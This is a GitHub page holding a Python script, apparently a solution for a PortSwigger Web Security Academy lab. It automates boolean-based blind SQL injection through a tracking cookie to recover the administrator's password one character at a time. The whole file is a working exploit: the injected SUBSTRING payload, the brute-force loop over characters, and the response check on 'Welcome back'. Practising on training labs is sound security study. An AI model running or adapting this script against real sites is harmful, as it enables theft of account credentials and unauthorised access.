SQLI_blind_bruteforce/blind_sql_bruteforce.py at main · JereC4str0/SQLI_blind_bruteforce · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
from termcolor import colored
import requests
import sys
import signal
import string
import time
from pwn import log

# Variables globales
p1 = None
p2 = None
password = ""

def def_handler(sig, frame):
    print(colored("\n\n[! Saliendo...]\n", "red"))
    if p1:
        p1.failure("Ataque detenido por el usuario")
    sys.exit(1)

# Registrar handler
signal.signal(signal.SIGINT, def_handler)

characters = string.ascii_lowercase + string.digits

def makeSQLI():
    global p1, p2, password
    password = ""  # Reiniciar

    p1 = log.progress("SQLI")
    p2 = log.progress("Password")

    p1.status("Iniciando ataque de fuerza bruta")
    time.sleep(1)

    for position in range(1, 21):
        found = False
        for character in characters:
            cookies = {
                'TrackingId': f"MvOj8narJjYLAYaQ' AND (SELECT SUBSTRING(password,{position},1) FROM users WHERE username='administrator')='{character}'-- -",
                'session': "VyEdGMgLdTnjYhnXo9xKeH3fVZ5KPNi0"
            }

            p1.status(f"Probando posición {position}: {character}")

            try:
                r = requests.get(
                    "https://0ab1007e0498e69a8311dc19001f003d.web-security-academy.net",
                    cookies=cookies,
                    timeout=10
                )
            except requests.RequestException as e:
                p1.failure(f"Error de conexión: {e}")
                sys.exit(1)

            if "Welcome back" in r.text:
                password += character
                p2.status(password)
                found = True
                break  # Sale del bucle de caracteres

        if not found:
            p1.success("Contraseña encontrada (posición vacía)")
            p2.success(password)
            print(colored(f"\n[+] Contraseña del administrador: {password}", "green"))
            return

        time.sleep(0.5)  # Rate limiting

    # Si llega aquí, completó 20 caracteres
    p1.success("Contraseña completa!")
    p2.success(password)
    print(colored(f"\n[+] Contraseña del administrador: {password}", "green"))

if __name__ == '__main__':
    makeSQLI()